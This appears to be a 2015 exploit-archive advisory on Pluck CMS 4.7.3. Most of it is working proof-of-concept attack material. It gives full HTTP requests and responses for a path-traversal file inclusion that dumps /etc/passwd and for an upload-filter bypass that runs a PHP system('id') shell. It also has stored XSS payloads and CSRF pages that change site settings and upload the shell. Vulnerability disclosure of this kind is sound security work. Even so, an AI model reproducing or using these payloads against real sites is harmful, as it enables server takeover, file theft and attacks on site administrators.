Home / os / winmobile

Pluck CMS 4.7.3 CSRF / XSS / LFI / Code Execution

Posted on 29 August 2015

# Title: Pluck 4.7.3 - Multiple vulnerabilities # Date: 28.08.15 # Vendor: pluck-cms.org # Affected versions: => 4.7.3 (current) # Tested on: Apache2.2 / PHP5 / Deb32 # Author: Smash_ | smaash.net # Contact: smash [at] devilteam.pl Few vulnerabilities. Bugs: - local file inclusion - code execution - stored xss - csrf 1/ LFI File inclusion vulnerability in pluck/admin.php in the in 'action' function allows to include local files or potentially execute arbitrary PHP code. #1 - Request (count = en.php by default): POST /pluck/admin.php?action=language HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/pluck/admin.php?action=language Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 49 cont1=../../../../../../../etc/passwd&save=Save #1 - Response: HTTP/1.1 200 OK Date: Fri, 28 Aug 2015 21:01:47 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.41-0+deb7u1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 7374 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 (...) <div id="content"> <h2>language settings</h2> <div class="success">The language settings have been saved.</div> (...) #2 - Request: POST /pluck/admin.php?action=language HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/pluck/admin.php?action=language Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 47 cont1=../../../../../../etc/passwd%00&save=Save #2 - Response: HTTP/1.1 200 OK Date: Fri, 28 Aug 2015 20:30:11 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.41-0+deb7u1 Set-Cookie: PHPSESSID=63erncd2l94qcah8g13bfvcga6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 4503 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh mysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/false messagebus:x:102:106::/var/run/dbus:/bin/false colord:x:103:107:colord colour management daemon,,,:/var/lib/colord:/bin/false usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false miredo:x:105:65534::/var/run/miredo:/bin/false ntp:x:106:113::/home/ntp:/bin/false Debian-exim:x:107:114::/var/spool/exim4:/bin/false arpwatch:x:108:117:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh avahi:x:109:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false beef-xss:x:110:119::/var/lib/beef-xss:/bin/false dradis:x:111:121::/var/lib/dradis:/bin/false pulse:x:112:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh haldaemon:x:114:124:Hardware abstraction layer,,,:/var/run/hald:/bin/false iodine:x:115:65534::/var/run/iodine:/bin/false postgres:x:116:127:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin redsocks:x:118:128::/var/run/redsocks:/bin/false snmp:x:119:129::/var/lib/snmp:/bin/false stunnel4:x:120:130::/var/run/stunnel4:/bin/false statd:x:121:65534::/var/lib/nfs:/bin/false sslh:x:122:133::/nonexistent:/bin/false Debian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false rtkit:x:124:136:RealtimeKit,,,:/proc:/bin/false saned:x:125:137::/home/saned:/bin/false devil:x:1000:1001:devil,,,:/home/devil:/bin/bash debian-tor:x:126:138::/var/lib/tor:/bin/false privoxy:x:127:65534::/etc/privoxy:/bin/false redis:x:128:139:redis server,,,:/var/lib/redis:/bin/false <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="../../../../../../etc/passwd" lang="../../../../../../etc/passwd"> <head> (...) 2/ Code Execution By default .php extenions shall be amended to .txt, but it is able to upload code simply by using other extension like php5. #1 - Request: POST /pluck/admin.php?action=files HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/pluck/admin.php?action=files Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------155797884312716218971623852778 Content-Length: 376 -----------------------------155797884312716218971623852778 Content-Disposition: form-data; name="filefile"; filename="phpinfo.php5" Content-Type: application/x-php <?php system('id'); ?> -----------------------------155797884312716218971623852778 Content-Disposition: form-data; name="submit" Upload -----------------------------155797884312716218971623852778-- #1 - Response: HTTP/1.1 200 OK Date: Fri, 28 Aug 2015 20:41:43 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.41-0+deb7u1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 9947 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 (...) #2 - Request: GET /pluck/files/phpinfo.php5 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/pluck/admin.php?action=files Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525 Connection: keep-alive #2 - Response: HTTP/1.1 200 OK Date: Fri, 28 Aug 2015 20:41:44 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.41-0+deb7u1 Vary: Accept-Encoding Content-Length: 54 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html uid=33(www-data) gid=33(www-data) groups=33(www-data) 3/ STORED XSS a) image upload XSS is possible via file name. Request: POST /pluck/admin.php?action=images HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/pluck/admin.php?action=images Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------3184135121063067737320373181 Content-Length: 5013 -----------------------------3184135121063067737320373181 Content-Disposition: form-data; name="imagefile"; filename="<img src=# onerror=alert(1337)>.png" Content-Type: image/png (...) -----------------------------3184135121063067737320373181 Content-Disposition: form-data; name="submit" Upload -----------------------------3184135121063067737320373181-- Response: HTTP/1.1 200 OK Date: Fri, 28 Aug 2015 20:43:19 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.41-0+deb7u1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 9125 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 (...) <div class="menudiv"> <strong>Name:</strong> <img src=# onerror=alert(1337)>.png <br /> <strong>Size:</strong> 4653 bytes <br /> <strong>Type:</strong> image/png <br /> <strong>Upload successful!</strong> </div> (...) b) page XSS is possible when changing request, value of POST 'content' will be encoded by default. #1 - Request: POST /pluck/admin.php?action=editpage HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/pluck/admin.php?action=editpage Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 127 title=hello12&seo_name=&content=<script>alert(1337)</script>&description=&keywords=&hidden=no&sub_page=&theme=default&save=Save #1 - Response: HTTP/1.1 200 OK Date: Fri, 28 Aug 2015 21:11:43 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.41-0+deb7u1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 7337 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 #2 - Request: GET /pluck/?file=hello12 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/pluck/?file=hello Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525 Connection: keep-alive #2 - Response: HTTP/1.1 200 OK Date: Fri, 28 Aug 2015 21:11:51 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.41-0+deb7u1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1289 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 (...) <div class="submenu"> </div> <div class="kop">hello12</div> <div class="txt"> <script>alert(1337)</script> </div> <div style="clear: both;"> </div> <div class="footer"> (...) 4/ CSRF Since there is no protection at all, it is able to trigger many actions via cross site request forgery. <html> <!-- Change site settings --> <body> <form action="http://localhost/pluck/admin.php?action=settings" method="POST"> <input type="hidden" name="cont1" value="pwn" /> <input type="hidden" name="cont2" value="usr@mail.box" /> <input type="hidden" name="save" value="Save" /> <input type="submit" value="Submit request" /> </form> </body> </html> <html> <!-- File upload --> <body> <script> var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/pluck/admin.php?action=files", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------155797884312716218971623852778"); xhr.withCredentials = true; var body = "-----------------------------155797884312716218971623852778 " + "Content-Disposition: form-data; name="filefile"; filename="phpinfo.php5" " + "Content-Type: application/x-php " + " " + "x3c?php " + "system('id'); " + "?x3e " + " " + "-----------------------------155797884312716218971623852778 " + "Content-Disposition: form-data; name="submit" " + " " + "Upload " + "-----------------------------155797884312716218971623852778--"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); </body> </html>

 

TOP